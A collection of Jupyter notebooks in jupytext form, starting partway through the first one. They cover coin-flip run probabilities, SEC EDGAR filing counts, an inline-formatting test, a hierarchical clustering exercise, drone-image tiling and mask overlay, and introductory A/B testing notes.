Fibonacci = fiblike([1] + [2**i for i in range(_N-1)])
return '$'+str(float('%.4g' % (
1-Fibonacci(_K+1)/float(2**_K) ))*100.0)+'\%$'
def Taylor_formatted(_N,_K):
"""Formatted result from Taylor expansion for use below"""
return '$'+str(float('%.4g' % ((_K-_N+2)/float(2**(_N+1))))*100.0)+'\%$'
def Exp_formatted(_N,_K):
"""Formatted result from Exponential expression for use below"""
return '$'+str(float('%.4g' % (1-np.exp(-(_K-_N+2)/float(2**(_N+1))) ))*100.0)+'\%$'
def Num_formatted(_Number):
"""Formatted float number as %"""
return '$'+str(float('%.4g' % _Number) *100.0)+'\%$'
data_matrix = [['A rally of N heads in K coin flips',
'$P=1-F_{K+2}^{(N)}/2^K$',
'$\simeq 1 - e^{-(K-N+2)/2^{N+1}}$',
'$\simeq (K-N+2)/2^{N+1}$'],
['$(5,11)$', Fibonacci_formatted(5,11), Exp_formatted(5,11), Taylor_formatted(5,11)],
['$(5,10)$', Fibonacci_formatted(5,10), Exp_formatted(5,10), Taylor_formatted(5,10)],
['$(15,40)$', Fibonacci_formatted(15,40), Exp_formatted(15,40), Taylor_formatted(15,40)],
['$(20,100)$',Fibonacci_formatted(20,100),Exp_formatted(20,100), Taylor_formatted(20,100)],
['$(7,150)$', Fibonacci_formatted(7,150), Exp_formatted(7,150), 'N/A'],
['$(20,10^6)$',Num_formatted(0.379253961),Exp_formatted(20,1e+6),'N/A'],
]
table = ff.create_table(data_matrix,colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']])
py.iplot(table)
# -
# The bottom two rows in the last column are 'N/A' because the ratio $\frac{K-N+2}{2^{N+1}}$ is not much smaller than $1$:
# * $(7,150)\rightarrow\frac{150-7+2}{2^{7+1}}\simeq 0.57$
# * $(20,10^6)\rightarrow\frac{10^6-20+2}{2^{20+1}}\simeq 0.48$
#
#
# The Fibonacci calculation is expensive and for the last row I took the result directly from [DrDobbs](http://www.drdobbs.com/architecture-and-design/20-heads-in-a-row-what-are-the-odds/229300217) instead of evaluating it. The goal in this notebook is to demonstrate the efficacy of the approximate expressions.
# ### Derivation of the semi-analytical model
#
#
# _Consider:_
# * A sequence of $K$ letters contains $K-N+1$ words of length $N$.
# * All possible binary words of length $N$, e.g. $\underbrace{10101110}_{N=8}$, fit in a dictionary of $2^N$ words.
# * If one picks words randomly in search of a specific word, such as $\underbrace{11111\ldots}_{N-\text{times}}$, the probability of _not_ finding it is: $\left(1-\frac{1}{\text{size of dictionary}}\right)^{\text{# of words picked randomly}}$
#
# Identifying words in a sequence of letters is different than picking words out of a hat. Suppose we flip a coin looking for words/rallies of $111$ and finally find the first one after tossing $110100\underline{111}$. There is a $\frac{1}{2}$ probability that if we toss again we will get a second rally back to back $1101001\underline{111}$, a $\frac{1}{4}$ probability for a third rally and so on. So the average number of rallies we can expect to have is [$2$](https://en.wikipedia.org/wiki/Zeno%27s_paradoxes); if we find one there will be one more (on average) back to back. Since the words/rallies in question appear in pairs they must be $\frac{1}{2}$ as common in the rest of the population so:
#
#
# Probability of _no_ rallies $\simeq \left(1-\frac{1}{\text{size of dictionary}}\right)^{\frac{\text{# of words in sequence}}{2}}=\left(1-\frac{1}{2^N}\right)^{\frac{K-N}{2}+1}$
#
# $\Rightarrow$ $\boxed{P \simeq 1-\left(1-\frac{1}{2^N}\right)^{\frac{K-N+2}{2}}}$
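# The back-to-back rally argument above can be spot-checked with a quick Monte Carlo (a sketch; the variable names are mine): once a rally exists, each further head extends it into one more overlapping rally with probability $\frac{1}{2}$, so the expected number of consecutive rallies is $2$.

```python
import random

random.seed(0)
trials = 100_000
total = 0
for _ in range(trials):
    rallies = 1                   # the rally we just found
    while random.random() < 0.5:  # each extra head (prob 1/2) adds one more rally
        rallies += 1
    total += rallies
print(total / trials)  # close to 2
```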
def SemiAnalytical_expression(_N,_Klist):
"""Semi-analytical calculation returns a list that enables plotting P(K)"""
trials = float(2**(_N))
return [1-(1-1.0/trials)**((_K-_N+2)/2.0) for _K in _Klist ]
# When $1\ll 2^N$ we can use $e=\lim_{n\rightarrow\infty}\left(1+\frac{1}{n}\right)^n$ to rewrite:
#
# $ \boxed{P \simeq 1 - \exp\left(-\frac{K-N+2}{2^{N+1}}\right),\quad \text{for}\quad 1\ll2^{N}}$
def Exponential_expression(_N,_Klist):
"""Exponential approximation returns a list that enables plotting P(K)"""
trials = float(2**(_N+1))
return [1-np.exp(-(_K-_N+2)/trials) for _K in _Klist ]
# Finally, in the limit $(K-N+2)\ll2^{N+1}$ we can use the Taylor expansion $e^x\simeq 1+x$ to simplify $P$:
#
# $ \boxed{P \simeq\frac{K-N+2}{2^{N+1}},\quad \text{for}\quad \frac{K-N+2}{2^{N+1}}\ll 1}$
def Taylor_expansion(_N,_Klist):
"""The Taylor expansion of the exponential returns a list that enables plotting P(K)"""
trials = float(2**(_N+1))
return [(_K-_N+2)/trials for _K in _Klist ]
# ### Stochastic matrix calculation
#
# To verify the semi-analytical expressions above I compare them with numerically calculated results obtained using the [Stochastic Matrix](https://en.wikipedia.org/wiki/Stochastic_matrix) method. This is an efficient approach that is often used to solve this problem, e.g. [Quora](https://www.quora.com/What-is-the-probability-of-getting-5-consecutive-heads-in-11-tosses-of-a-fair-coin).
#
# The function takes (N,K) as parameters and returns:
#
# * K_list = [2,3,4,5,...,K]
#
# * P_list = List of probabilities for "i" coin tosses with "i" in K_list.
def Stochastic_Matrix_PvsN(_N,_K):
"""Stochastic matrix method"""
# Initial state
d0 = np.zeros(_N+1)
d0[0] = 1.0
# Initialize stochastic matrix
M = np.zeros((_N+1,_N+1))
for i in range(0,_N):
M[0,i] = 0.5
M[i+1,i] = 0.5
M[_N,_N] = 1.0
# Calculate probability for an N-length run
Mn = np.copy(M)
Plist = []
Klist = range(2,_K+1)
for i in Klist:
Mn = np.matmul(Mn,M)
Plist.append( np.matmul(Mn,d0.T)[_N])
return Plist, Klist
# ### Comparison between semi-analytical model and numerical calculations
#
# The parameters in the calculation are $N=5,10,20,30$ and $K=N+1,\ldots 10^6$.
# +
Run_length = [5,10,20,30]
TotalTrials = 1000000
xaxis = [None] * len(Run_length)
Numerical = [None] * len(Run_length)
SemiAnalytical = [None] * len(Run_length)
Exponential = [None] * len(Run_length)
TaylorExpansion = [None] * len(Run_length)
for i,run in enumerate(Run_length):
Numerical[i], xaxis[i] = Stochastic_Matrix_PvsN(run, TotalTrials)
SemiAnalytical[i] = SemiAnalytical_expression(run, xaxis[i])
Exponential[i] = Exponential_expression(run, xaxis[i])
TaylorExpansion[i] = Taylor_expansion(run, xaxis[i])
# -
# Now let's plot the results:
import matplotlib.pyplot as plt
import matplotlib.lines as mlines
# %matplotlib inline
# +
plt.figure(figsize=(15,10))
colors = ['Red','Green','Blue','Black']
FSZ = 20
ymin = 1e-9
for i,run in enumerate(Run_length):
plt.loglog(xaxis[i][(run+1):],Numerical[i][(run+1):],color=colors[i],lw =4, alpha = 0.4)#,label = 'x='+str(run))
plt.loglog(xaxis[i][(run+1):],Exponential[i][(run+1):],color=colors[i],lw = 2,ls = '-')#,label="Analytical")
plt.loglog(xaxis[i][(run+1):],TaylorExpansion[i][(run+1):],color=colors[i],lw = 2,ls = '--')#,label="Analytical")
plt.ylim([ymin,1])
plt.xlabel("# of coin flips",fontsize = FSZ)
plt.title("Probability of at least one rally of N heads",fontsize = FSZ)
plt.xticks([10**i for i in range(1,int(np.ceil(np.log10(TotalTrials)))+1 )], fontsize = FSZ)
plt.yticks([10**i for i in range(0,int(np.log10(ymin)) ,-2) ], fontsize = FSZ)
plt.text(15, 0.15, 'N=5',rotation=23, color=colors[0], fontsize=FSZ)
plt.text(50, 0.022, 'N=10',rotation=23, color=colors[1], fontsize=FSZ)
plt.text(400, 0.02*1e-2, 'N=20',rotation=23, color=colors[2], fontsize=FSZ)
plt.text(2000, 0.085*1e-5, 'N=30',rotation=23, color=colors[3], fontsize=FSZ)
fatline = mlines.Line2D([], [], color='Black',lw =4, alpha = 0.4, label = 'Stochastic matrix calculation' )
solidline = mlines.Line2D([], [], color='Black',lw =2, ls = '-', label = '$1-\exp[-(K-N+2)/2^{N+1}]$')
brokenline = mlines.Line2D([], [], color='Black',lw =2, ls = '--', label = '$(K-N+2)/2^{N+1}$')
plt.legend(handles=[fatline,solidline,brokenline],loc='lower right',fontsize = FSZ )
plt.show()
# -
# The Taylor expansion is in good agreement with the numerical solution as long as $P\lesssim 0.1$. So the first step is to calculate $(K-N+2)/2^{N+1}$ and only if the result is larger than $0.1$ I will switch to the exponential expression. To confirm that the exponential expression performs well as $K$ increases, I calculate the relative error between the numerical solution and the exponential expression.
#
# $\text{Error} = \frac{\vert P_{\text{Exponential}}-P_{\text{Numerical}}\vert}{P_{\text{Numerical}}}$
# +
Relative_error_Exponential= []
for a,t,n in zip(Exponential,TaylorExpansion,Numerical):
Relative_error_Exponential.append([ np.abs(a[i]/(n[i]+1e-15) - 1) for i in range(0,len(n))])
plt.figure(figsize=(15,10))
for i,run in enumerate(Run_length):
plt.loglog(xaxis[i][(run+1):],Relative_error_Exponential[i][(run+1):],color= colors[i], lw = 3, label = 'N = '+str(run))
ymin_err = 1e-9
plt.ylim([ymin_err,1])
plt.xlabel('# of coin flips',fontsize = FSZ)
plt.title('Error = |Exponential/Numerical - 1|',fontsize = FSZ)
plt.legend(loc='upper right',fontsize = FSZ )
plt.xticks([10**i for i in range(1,int(np.ceil(np.log10(TotalTrials)))+1 )], fontsize = FSZ)
plt.yticks([10**i for i in range(0,int(np.log10(ymin_err)),-2) ], fontsize = FSZ)
plt.show()
# -
# ### Appendix: Exact answer using the Fibonacci N-step sequence
#
# __Looking backward:__
#
# Let $S_K$ be the number of sequences of $K$ tosses that don't have $N$ consecutive heads, $S_{K,H}$ the portion of $S_K$ that ends in heads, and $S_{K,T}$ the portion of $S_K$ that ends in tails. By definition then:
#
# $S_K=S_{K,H}+S_{K,T}=
# \underbrace{S_{K−1,H}+S_{K-1,T}}_{S_{K,H}}+S_{K,T}=
# \underbrace{S_{K−2,H}+S_{K-2,T}}_{S_{K−1,H}}+S_{K-1,T}+S_{K,T}=\ldots\text{until}\ldots=\underbrace{S_{K−N+1,T}}_{S_{K−N+2,H}}+\sum_{i=0}^{N-2}S_{K-i,T}=
# \sum_{i=0}^{N-1}S_{K-i,T}$
#
#
# To end in tails, you just have to come from a sequence one shorter, so $S_{K,T}=S_{K−1}$. This yields:
#
# $S_K=\sum_{i=0}^{N-1}S_{K-1-i}\Rightarrow S_{K}=\sum_{i=1}^{N}S_{K-i}$
#
# This is the Fibonacci N-step sequence.
#
# __Looking forward:__
#
# * After $K=1$ tosses I have two possible sequences, $H$ and $T$, so $S_1 = F_{1+2}^{(N)} = 2$.
#
# * After $K<N$ tosses I have $2^K$ possible sequences: $S_{K<N} = F_{K+2}^{(N)} = 2^{K}$.
#
# * After $K=N$ tosses I have $2^K-1$ possible sequences: $S_{K=N} = F_{K+2}^{(N)} = 2^{K}-1$.
#
# * After $K>N$ I can use the expression $S_{K}=\sum_{i=1}^{N}S_{K-i}$.
#
# So, after $K$ coin tosses I have $S_K = F_{K+2}^{(N)}$ sequences with no rally of $N$ heads. Therefore, the probability of at least one rally of $N$ heads is:
#
# $P = 1- F_{K+2}^{(N)}/2^K$
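# The exact formula can be verified by brute-force enumeration for small $N$ and $K$ (a sketch; the function names are mine, not from the text):

```python
from itertools import product

def p_run_bruteforce(N, K):
    """P(at least one run of N heads in K tosses), by enumerating all 2^K sequences."""
    hits = sum(1 for seq in product('HT', repeat=K) if 'H' * N in ''.join(seq))
    return hits / 2 ** K

def p_run_fibonacci(N, K):
    """The same probability via P = 1 - F_{K+2}^{(N)} / 2^K, using S_K = sum of the previous N terms."""
    S = [2 ** k for k in range(N)] + [2 ** N - 1]  # S_k = 2^k for k < N, S_N = 2^N - 1
    for k in range(N + 1, K + 1):
        S.append(sum(S[-N:]))
    return 1 - S[K] / 2 ** K

print(p_run_bruteforce(3, 10), p_run_fibonacci(3, 10))  # both 0.5078125
```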
|
Consecutive_heads.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#pip install python-edgar
import edgar
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt  # used for tick rotation in the plots below
# specify the directory where you want to store the data;
# this downloads the quarterly index data since the given year
edgar.download_index('C:/Users/user/Desktop/Bek', 2021, skip_all_present_except_last=False)
# -
# ***
# ### II.
# Analyze the frequency of forms filed during the first quarter of 2021:
# build tables of both the number of forms of each specific type
# and the number of companies that filed at least one form of each type.
# For the top 10 most popular forms,
# plot these quantities as a function of the day of the quarter.
# ***
# Answer: In this part I decided to use the edgar module, which downloads the quarterly data for us. The quarterly data is stored at the link below: https://www.sec.gov/Archives/edgar/full-index/
# read the stored index data
data = pd.read_csv('C:/Users/user/Desktop/Bek/2021-QTR1.tsv', sep='|', lineterminator='\n', names=None)
#renaming columns
data.columns.values[0]='CIK'
data.columns.values[1]='Company Name'
data.columns.values[2]='FormType'
data.columns.values[3]='Date'
data.columns.values[4]='Txt'
data.columns.values[5]='Link'
#csv["Date"] = pd.to_datetime(csv["Date"])
data = data.sort_values(by="Date")
data.head(10)
#pd.set_option("display.max_rows", None, "display.max_columns", None)
# number of companies that filed each type of form
data.groupby(['Company Name','FormType']).size().reset_index(name='Count')
#table of the number of filings of each form type
form_count = data.groupby("FormType")["FormType"].count().reset_index(name='Count')
form_count
#top 10 most frequently filed forms in the first quarter
f_10 =form_count.nlargest(10,'Count')
f_10
sns.set_theme(style="whitegrid")
tips = sns.load_dataset("tips")
sns.set(rc={'figure.figsize':(11.7,8.27)})
sns.barplot(x="FormType", y="Count", data=f_10);
# top 10 filed forms by date within the quarter
date_in_quater = data.groupby(['Date','FormType']).size().reset_index(name='Count')
date_q = date_in_quater.nlargest(10, 'Count')
#date_q.sort_values(by='Date')
date_q
#plot of the data above
sns.barplot(x="Date", y="Count", hue="FormType", data=date_q,dodge=False);
plt.xticks(rotation=45)
plt.tight_layout()
|
TaskNumberTwo.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python
# language: python3
# name: python3
# ---
# # Inline
#
# A test suite for inline items
# ## Code
#
# Here is some inline python `import numpy as np` that should be displayed
#
# and some text that is not code `here`
# ## Math
#
# Inline maths with inline role: $ x^3+\frac{1+\sqrt{2}}{\pi} $
#
# Inline maths using dollar signs (not supported yet): $x^3+frac{1+sqrt{2}}{pi}$ as the
# backslashes are removed.
|
tests/ipynb/inline.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import copy
from collections import defaultdict
# -
# ## Ex.1 (4pts) Reading in distance matrices
#
# Write a function that is able to read distance matrices and store them, for instance, in a dictionary of dictionaries so that distances can be accessed like dist['D']['B'].
#
# +
#### Dict method ####
# -
def read_distance_dict(filename):
with open(r'C:\Users\<NAME> R S\Downloads\SoSe 2020\\'+filename,'r') as f:
dist={}
content=f.readlines()
dkey=' '.join(content[0])
dk=dkey.split()
for line in content[1:]:
entries=line.split()
label=entries[0]
distance=entries[1:]
dist[label]={}
for k,v in zip(dk,distance):
if label!=k:
dist[label][k]=float(v)
return dist
matrix=(read_distance_dict('small-distances.txt'))
matrix['A']['B']
# +
#### Dataframe method ####
# +
def read_distance_df(filename):
distance = open(r'C:\Users\<NAME> R S\Downloads\SoSe 2020\\'+filename,'r').read().splitlines()
distance_seq = ''.join(distance[0].split())
distance = distance[1:] # cut header
distance = [line[2:] for line in distance]
distance = [line.split() for line in distance]
distance = [list(map(int, line)) for line in distance[:]]
distance = pd.DataFrame(distance)
for i in range(len(distance_seq)):
distance.rename(columns={ distance.columns[i]: distance_seq[i] }, inplace = True)
rows_dict = defaultdict()
for i in range(len(distance_seq)):
rows_dict[i] = distance_seq[i]
distance.rename(index=rows_dict, inplace = True)
return distance
small_distances = read_distance_df("small-distances.txt")
print("Small Distances\n",small_distances,"\n")
print("Dictionary Query [A][B] =",small_distances["A"]["B"])
# -
# ## Ex.2 (4pts) Number of elements of a nested tuple
#
# First, write a function that counts the number of elementary objects in a nested tuple. I.e., the function should return 3 for (('A','B'),'C') and 5 for ((('A','B'),'C'),('D','E')). This function will be helpful when determining cluster distances.
#
def count_tuples(object):
"""function to count the number of elements in a tuple by flattening it
arg: input tuple
return : count"""
def flatten2list(object):
gather = []
for item in object:
if isinstance(item, (list, tuple, set)):
gather.extend(flatten2list(item))
else:
gather.append(item)
return gather
return len(flatten2list(object))
print(count_tuples((('A','B'),'C')))
print(count_tuples(((('A','B'),'C'),('D','E'))))
# # Ex.3 (4pts) Merging clusters
#
# Write a function taking three parameters: a distance matrix (i.e. a dictionary of dictionaries as in exercise 1) and two clusters (represented as strings / tuples) that merges the two clusters by updating the distance matrix.
#
# +
### dict form distance matrix ####
# +
def merge_cluster(dist,a,b):
m,n=count_tuples(a),count_tuples(b)
c=(a,b)
dist[c]={}
for k in dist.keys():
if k==a or k==b or k==c:
continue
nd=(dist[k][a]*n + dist[k][b]*m)/(m+n)
dist[c][k]=nd
dist[k][c]=nd
del dist[a]
del dist[b]
for k in dist.keys():
if k!=c:
del dist[k][a]
del dist[k][b]
return c
merge_cluster(matrix,'D','E')
# +
### Dataframe based distance matrix ###
# +
def cluster_merging(dist_matrix, clusterA, clusterB):
# Agglomerative Clustering
# Init
dist_matrix_reduced = copy.copy(dist_matrix) # Copying for not changing the object outside and easier debugging
cardinality_clusterA = count_tuples(clusterA)
cardinality_clusterB = count_tuples(clusterB)
    # Calculate the merged column, rename, and delete the old columns; then transpose and repeat for the rows. This works as long as the matrix is symmetric (the transpose should be cheap since presumably only indices change)
reduced_column = (cardinality_clusterA * dist_matrix_reduced[clusterA] + cardinality_clusterB * dist_matrix_reduced[clusterB]) / ( cardinality_clusterA + cardinality_clusterB )
dist_matrix_reduced[(clusterA, clusterB)] = reduced_column
del(dist_matrix_reduced[clusterA])
del(dist_matrix_reduced[clusterB])
dist_matrix_reduced = dist_matrix_reduced.T
reduced_column = (cardinality_clusterA * dist_matrix_reduced[clusterA] + cardinality_clusterB * dist_matrix_reduced[clusterB]) / ( cardinality_clusterA + cardinality_clusterB )
dist_matrix_reduced[(clusterA, clusterB)] = reduced_column
del(dist_matrix_reduced[clusterA])
del(dist_matrix_reduced[clusterB])
dist_matrix_reduced = dist_matrix_reduced.T
# Identity 0-ing
dist_matrix_reduced[(clusterA,clusterB)][(clusterA,clusterB)] = 0
return dist_matrix_reduced
# Call with Distance Matrix and Keys / Tuples to be removed
cluster_iter_1 = cluster_merging(small_distances, ('C'), ('B'))
print(cluster_iter_1)
# -
# # Ex.4 (4pts) Find closest clusters
# +
### dict based distance matrix ###
# +
def finding_small_distance_main(matrix):
def finding_small_distance(matrix):
list_key_val=[]
for i in matrix.values():
min_val=min(i.values()) # minimum value of each row -- value (in dict of dict)
min_key=''.join([k for k, v in i.items() if v == min(i.values())][0]) # key of that min value
key= ''.join([str(k) for k, v in matrix.items() if v ==i]) # main key of that value
#print(min_val,min_key,key)
min_val_min_key_key=((min_val,min_key,key))
list_key_val.append(min_val_min_key_key)
return tuple([k for k in sorted(list_key_val,key=lambda item: item[0],reverse=False)][0])
return tuple(finding_small_distance(matrix)[1:]),finding_small_distance(matrix)[0]
#cluster1,cluster2,value=
cluster,val=finding_small_distance_main(matrix)
cluster,val
# +
### data frame based distance matrix ###
# +
def find_smallest_distance(dist_matrix):
min_val = dist_matrix.replace(0, np.nan).stack().min()
min_idx = dist_matrix.replace(0, np.nan).stack().idxmin()
return min_idx, min_val
nearest_clusters = find_smallest_distance(small_distances)
print("The nearest clusters are", nearest_clusters[0], "with a distance of", nearest_clusters[1])
# -
# # Ex.5 (4pts) Hierarchical clustering
def hierarchical_clustering(_distance_matrix):
distance_matrix = copy.copy(_distance_matrix)
heights = dict.fromkeys(distance_matrix,0)
while len(distance_matrix) > 1:
cluster, value = find_smallest_distance(distance_matrix)
distance_matrix = cluster_merging(distance_matrix, cluster[0], cluster[1])
heights.update({cluster : value/2})
return distance_matrix, heights
tree_smalldistances, cluster_heights_smalldistances = hierarchical_clustering(small_distances)
print("Tree Clusters by agglomeration - small-distances.txt:\n", *tree_smalldistances)
from showtree import showtree
print(showtree(*tree_smalldistances, cluster_heights_smalldistances))
|
solutions/Ruppa Surulinathan-plab-05.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: a3dbr
# language: python
# name: a3dbr
# ---
# # Clean code to crop and concatenate drone images
#
# Tools to crop large drone images into smaller tiles that can be used with a Deeplabv3+ model to make predictions, along with code that takes those predictions for the cropped tiles and concatenates them back to the original image size. There is also a function that superimposes the predicted mask on top of the drone images.
#
#
# +
from image_slicer import save_tiles, slice
from pathlib import Path
from PIL import Image
import numpy as np
from math import sqrt, ceil, floor
import os
import glob
def get_concat_h(im2, im1):
dst = Image.new('RGB', (im2.width + im1.width, im2.height))
dst.paste(im2, (0, 0))
dst.paste(im1, (im2.width, 0))
return dst
def get_concat_v(im2, im1):
dst = Image.new('RGB', (im2.width, im2.height + im1.height))
dst.paste(im2, (0, 0))
dst.paste(im1, (0, im2.height))
return dst
def concat_masks(mask_path, croped_masks_path,images_path,num_cols,num_rows,new_height,new_width,mask_type="png",image_type="jpg"):
os.makedirs(mask_path, exist_ok=True)
croped_filenames = glob.glob(os.path.join(croped_masks_path,"*"+mask_type))
files_names = glob.glob(os.path.join(images_path,"*"+image_type))
images_names = [Path(x).stem for x in files_names]
for name in images_names:
#print(name)
croped_mask_path = os.path.join(croped_masks_path, Path(name).stem + "_{row:02d}_{col:02d}." + mask_type)
row_images = []
for i in range(num_rows):
path_i_1 = croped_mask_path.format(row = i+1, col = 1)
im_i_1 = Image.open(path_i_1)
for j in range(1,num_cols):
path_i_j = croped_mask_path.format(row = i+1, col = j+1)
im_i_j = Image.open(path_i_j)
im_i_1 = get_concat_h(im_i_1, im_i_j)
row_images.append(im_i_1)
im_1 = row_images[0]
for i in range(1,num_rows):
im_1 = get_concat_v(im_1,row_images[i])
concat_mask_path = os.path.join(mask_path, name + "." + mask_type)
#print(concat_mask_path)
        im_1 = im_1.resize((new_height,new_width))  # note: PIL's resize takes (width, height); call sites pass new_height=width, new_width=height
im_1.save(concat_mask_path)
def crop_images(images_path, croped_images_path,crop_num,image_type):
os.makedirs(croped_images_path, exist_ok=True)
files_names = glob.glob(os.path.join(images_path,"*"+image_type))
for file_name in files_names:
croped_images = slice(file_name, crop_num, save=False)
save_tiles(croped_images, prefix=Path(file_name).stem, directory=croped_images_path, format="JPEG")
def resize_images(croped_images_path,new_height,new_width,image_type):
files_names = glob.glob(os.path.join(croped_images_path,"*"+image_type))
for filename in files_names:
im = Image.open(filename)
im = im.resize((new_height,new_width))
im.save(filename)
def superimpose_images_masks(superimposed_path,images_path,masks_path):
os.makedirs(superimposed_path, exist_ok=True)
files_names = glob.glob(os.path.join(images_path,"*"+"JPG"))
images_names = [Path(x).stem for x in files_names]
for name in images_names:
mask_file_path = os.path.join(masks_path, name + "." + "png")
image_file_path = os.path.join(images_path, name + "." + "JPG")
superimposed_file_path = os.path.join(superimposed_path, name + "." + "jpg")
image = Image.open(image_file_path)
background = image.convert('RGBA')
mask = Image.open(mask_file_path)
foreground = mask.convert('RGBA')
superimp =Image.blend(background, foreground, alpha=.35)
superimp = superimp.convert('RGB')
superimp.save(superimposed_file_path)
# -
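# As a quick sanity check of the concatenation helpers above (a sketch using tiny synthetic tiles rather than real drone images, with the helpers restated so it runs standalone):

```python
from PIL import Image

def get_concat_h(im2, im1):
    # Paste im1 to the right of im2.
    dst = Image.new('RGB', (im2.width + im1.width, im2.height))
    dst.paste(im2, (0, 0))
    dst.paste(im1, (im2.width, 0))
    return dst

def get_concat_v(im2, im1):
    # Paste im1 below im2.
    dst = Image.new('RGB', (im2.width, im2.height + im1.height))
    dst.paste(im2, (0, 0))
    dst.paste(im1, (0, im2.height))
    return dst

a = Image.new('RGB', (4, 3), 'red')
b = Image.new('RGB', (2, 3), 'blue')
h = get_concat_h(a, b)  # widths add: 6 x 3
v = get_concat_v(a, a)  # heights add: 4 x 6
print(h.size, v.size)
```

# Widths add under horizontal concatenation and heights under vertical, which is why concat_masks walks each row with get_concat_h before stacking rows with get_concat_v.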
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images_croped_2/"
crop_images(images_path, croped_images_path,crop_num=12,image_type="JPG")
resize_images(croped_images_path,new_height=512,new_width=512,image_type="jpg")
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_croped_2/"
masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_2/"
#concat_masks(masks_path, croped_masks_path,images_path,num_cols=4,num_rows=3,new_height=4000,new_width=3000,mask_type="png",image_type="JPG")
superimposed_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_2/"
superimpose_images_masks(superimposed_path,images_path,masks_path)
import numpy as np
filename = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_2/DJI_0113.JPG"
im_org = Image.open(filename)
data = np.asarray(im_org)
data.shape
# # Dicece32
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_croped_dicece32/"
masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_dicece32/"
concat_masks(masks_path, croped_masks_path,images_path,num_cols=4,num_rows=3,new_height=4000,new_width=3000,mask_type="png",image_type="JPG")
superimposed_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_dicece32/"
superimpose_images_masks(superimposed_path,images_path,masks_path)
# # Dicece32 probs
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_croped_probs_dicece32/"
masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_probs_dicece32/"
concat_masks(masks_path, croped_masks_path,images_path,num_cols=4,num_rows=3,new_height=4000,new_width=3000,mask_type="png",image_type="JPG")
superimposed_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_dicece32_probs/"
superimpose_images_masks(superimposed_path,images_path,masks_path)
|
Example_Notebooks/clean_drone_images_croped_ST.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# A/B testing is a method for testing a change to a particular product; it is most commonly used to test changes to elements of a web page. The A/B testing framework follows this sequence:
#
# * Design a research question.
# * Choose the test statistic or metrics used to evaluate the experiment.
# * Design the control group and the experiment group.
# * Analyze the results and draw valid conclusions.
#
# A/B testing is used to validate whether a change applied to our product significantly affects our users, instead of relying solely on expert opinion.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-40043986740) 0:03*
#
# <!--TEASER_END-->
# ## When to use A/B testing
# 
# A/B testing can help you converge toward an optimum, but it is not useful for comparing two separate optima, nor is it particularly useful for broad, overall testing.
#
# Consider example above:
#
# 1. This example can't be used for A/B testing. It tries to answer a vague question and is too general; we don't know which specific metric or method to use to answer it. The only thing we can do is test a specific product.
# 2. It's not designed to test a premium service on your site. Suppose you have a bunch of premium features and decide to do some A/B testing, dividing users into control and experiment groups. The groups would not be roughly equal, since some users opt for premium and others don't, and the change would not affect all users. So we could gather some knowledge, but not run a full-blown test.
# 3. The third one is where A/B testing can shine. The change affects all users, so we can divide them into both groups, and we have clear metrics to test the algorithm, for example by ranking.
# 4. The fourth one is also where A/B testing can be useful. We have the whole set of products we want to test and metrics we can measure, as long as we have the computing power.
# Let's take some other examples.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398678/m-4004398680) 0:51*
# In the first part, we know that things like cars can take a very long time to sell. A/B testing only collects data that occurs in a small window (at least for us to analyze). A customer may come back to the website six months to a year later to buy, and maybe not via the website at all but via other referrals. We can't wait that long for testing purposes, and the data wouldn't be enough. The second part relates to the first reason: after updating a company's logo, it takes time for customers to react, so it isn't a good fit for A/B testing. In the final part, we have clear control and experiment groups and clear metrics, so A/B testing is useful for that situation.
